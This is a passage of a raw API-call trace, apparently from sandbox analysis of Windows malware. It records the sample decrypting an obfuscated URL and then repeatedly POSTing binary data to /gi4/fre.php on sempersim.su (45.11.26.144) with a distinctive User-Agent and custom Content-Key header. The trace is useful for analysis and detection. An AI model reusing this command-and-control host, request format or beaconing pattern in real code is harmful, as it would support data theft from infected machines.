Flags=0x0, Size=0x20) returned 0x5cb100 [0208.451] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdcc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0208.455] GetProcessHeap () returned 0x5b0000 [0208.455] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa70 [0208.455] socket (af=2, type=1, protocol=6) returned 0x31c [0208.456] connect (s=0x31c, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0208.525] FreeAddrInfoW (pAddrInfo=0x5cdcc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0208.525] GetProcessHeap () returned 0x5b0000 [0208.525] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0208.525] GetProcessHeap () returned 0x5b0000 [0208.526] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0208.526] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0208.528] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0208.528] GetProcessHeap () returned 0x5b0000 [0208.528] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0208.528] GetProcessHeap () returned 0x5b0000 [0208.528] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0208.528] GetProcessHeap () returned 0x5b0000 [0208.528] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3470 [0208.528] GetProcessHeap () returned 0x5b0000 [0208.528] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0208.529] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0208.530] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0208.530] GetProcessHeap () returned 0x5b0000 [0208.530] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0208.530] GetProcessHeap () returned 0x5b0000 [0208.531] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0208.531] send (s=0x31c, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0208.531] send (s=0x31c, buf=0x5d1e18*, len=159, flags=0) returned 159 [0208.531] GetProcessHeap () returned 0x5b0000 [0208.531] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0208.531] recv (in: s=0x31c, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0210.147] GetProcessHeap () returned 0x5b0000 [0210.147] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0210.147] GetProcessHeap () returned 0x5b0000 [0210.148] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0210.148] GetProcessHeap () returned 0x5b0000 [0210.148] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0210.148] GetProcessHeap () returned 0x5b0000 [0210.148] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0210.148] closesocket (s=0x31c) returned 0 [0210.149] GetProcessHeap () returned 0x5b0000 [0210.149] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa70 | out: hHeap=0x5b0000) returned 1 [0210.149] GetProcessHeap () returned 0x5b0000 [0210.150] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5070 | out: hHeap=0x5b0000) returned 1 [0210.150] GetProcessHeap () returned 0x5b0000 [0210.150] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0210.150] GetProcessHeap () returned 0x5b0000 [0210.150] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0210.151] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1284) returned 0x31c [0210.152] Sleep (dwMilliseconds=0xea60) [0210.155] GetProcessHeap () returned 0x5b0000 [0210.155] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d35d8 [0210.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.157] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0210.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.163] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0210.175] GetProcessHeap () returned 0x5b0000 [0210.175] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0210.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.176] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0210.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.177] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0210.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.178] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.178] GetProcessHeap () returned 0x5b0000 [0210.179] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0210.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.180] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d35d8, pdwDataLen=0xdfcfc | out: pbData=0x5d35d8, pdwDataLen=0xdfcfc) returned 1 [0210.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.181] CryptDestroyKey (hKey=0x5bde08) returned 1 [0210.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.182] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0210.182] GetProcessHeap () returned 0x5b0000 [0210.182] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0210.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0210.183] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0210.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0210.184] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0210.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0210.185] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0210.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0210.191] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0210.191] GetProcessHeap () returned 0x5b0000 [0210.191] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0210.191] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0210.191] GetProcessHeap () returned 0x5b0000 [0210.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0210.192] GetProcessHeap () returned 0x5b0000 [0210.192] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0210.192] GetProcessHeap () returned 0x5b0000 [0210.193] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d35d8 | out: hHeap=0x5b0000) returned 1 [0210.193] GetProcessHeap () returned 0x5b0000 [0210.193] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e88 [0210.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.194] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0210.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.199] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0210.208] GetProcessHeap () returned 0x5b0000 [0210.208] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8680 [0210.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.209] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8680, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0210.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.210] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0210.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.211] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.211] GetProcessHeap () returned 0x5b0000 [0210.211] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8680 | out: hHeap=0x5b0000) returned 1 [0210.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.212] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e88, pdwDataLen=0xdfcfc | out: pbData=0x5d2e88, pdwDataLen=0xdfcfc) returned 1 [0210.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.213] CryptDestroyKey (hKey=0x5be048) returned 1 [0210.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0210.229] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0210.229] GetProcessHeap () returned 0x5b0000 [0210.230] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5070 [0210.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0210.231] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0210.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0210.232] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0210.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0210.233] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0210.233] GetProcessHeap () returned 0x5b0000 [0210.233] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0210.233] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cda70*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0210.237] GetProcessHeap () returned 0x5b0000 [0210.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca950 [0210.237] socket (af=2, type=1, protocol=6) returned 0x320 [0210.238] connect (s=0x320, name=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0210.358] FreeAddrInfoW (pAddrInfo=0x5cda70*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0210.358] GetProcessHeap () returned 0x5b0000 [0210.359] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0210.359] GetProcessHeap () returned 0x5b0000 [0210.359] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0210.360] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0210.361] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0210.361] GetProcessHeap () returned 0x5b0000 [0210.361] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0210.361] GetProcessHeap () returned 0x5b0000 [0210.361] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0210.361] GetProcessHeap () returned 0x5b0000 [0210.361] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2fa8 [0210.361] GetProcessHeap () returned 0x5b0000 [0210.361] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0210.362] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0210.363] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0210.363] GetProcessHeap () returned 0x5b0000 [0210.363] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0210.363] GetProcessHeap () returned 0x5b0000 [0210.363] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0210.363] send (s=0x320, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0210.364] send (s=0x320, buf=0x5d1e18*, len=159, flags=0) returned 159 [0210.364] GetProcessHeap () returned 0x5b0000 [0210.364] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0210.364] recv (in: s=0x320, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0211.977] GetProcessHeap () returned 0x5b0000 [0211.978] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0211.978] GetProcessHeap () returned 0x5b0000 [0211.978] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2fa8 | out: hHeap=0x5b0000) returned 1 [0211.978] GetProcessHeap () returned 0x5b0000 [0211.979] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0211.979] GetProcessHeap () returned 0x5b0000 [0211.979] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0211.979] closesocket (s=0x320) returned 0 [0211.980] GetProcessHeap () returned 0x5b0000 [0211.980] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca950 | out: hHeap=0x5b0000) returned 1 [0211.980] GetProcessHeap () returned 0x5b0000 [0211.980] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5070 | out: hHeap=0x5b0000) returned 1 [0211.980] GetProcessHeap () returned 0x5b0000 [0211.980] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e88 | out: hHeap=0x5b0000) returned 1 [0211.980] GetProcessHeap () returned 0x5b0000 [0211.981] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0211.997] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1278) returned 0x320 [0211.999] Sleep (dwMilliseconds=0xea60) [0212.023] GetProcessHeap () returned 0x5b0000 [0212.023] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3038 [0212.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.024] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0212.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.033] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5e60) returned 1 [0212.041] GetProcessHeap () returned 0x5b0000 [0212.041] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8680 [0212.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.042] CryptImportKey (in: hProv=0x5c5e60, pbData=0x5c8680, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0212.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.043] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0212.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.044] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.044] GetProcessHeap () returned 0x5b0000 [0212.044] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8680 | out: hHeap=0x5b0000) returned 1 [0212.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.045] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3038, pdwDataLen=0xdfcfc | out: pbData=0x5d3038, pdwDataLen=0xdfcfc) returned 1 [0212.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.073] CryptDestroyKey (hKey=0x5be288) returned 1 [0212.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.074] CryptReleaseContext (hProv=0x5c5e60, dwFlags=0x0) returned 1 [0212.092] GetProcessHeap () returned 0x5b0000 [0212.092] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0212.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0212.093] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0212.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0212.094] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0212.095] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0212.095] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0212.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0212.096] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0212.096] GetProcessHeap () returned 0x5b0000 [0212.096] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0212.096] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0212.097] GetProcessHeap () returned 0x5b0000 [0212.097] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0212.097] GetProcessHeap () returned 0x5b0000 [0212.098] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0212.098] GetProcessHeap () returned 0x5b0000 [0212.098] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3038 | out: hHeap=0x5b0000) returned 1 [0212.098] GetProcessHeap () returned 0x5b0000 [0212.098] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0212.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.099] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0212.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.106] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0212.115] GetProcessHeap () returned 0x5b0000 [0212.115] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0212.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.117] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0212.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.118] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0212.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.119] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.119] GetProcessHeap () returned 0x5b0000 [0212.119] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0212.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.120] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0212.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.121] CryptDestroyKey (hKey=0x5bde08) returned 1 [0212.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0212.122] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0212.122] GetProcessHeap () returned 0x5b0000 [0212.122] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0212.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0212.123] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0212.124] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0212.125] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0212.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0212.128] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0212.128] GetProcessHeap () returned 0x5b0000 [0212.128] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0212.128] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce060*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0212.130] GetProcessHeap () returned 0x5b0000 [0212.130] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9d0 [0212.130] socket (af=2, type=1, protocol=6) returned 0x324 [0212.130] connect (s=0x324, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0212.203] FreeAddrInfoW 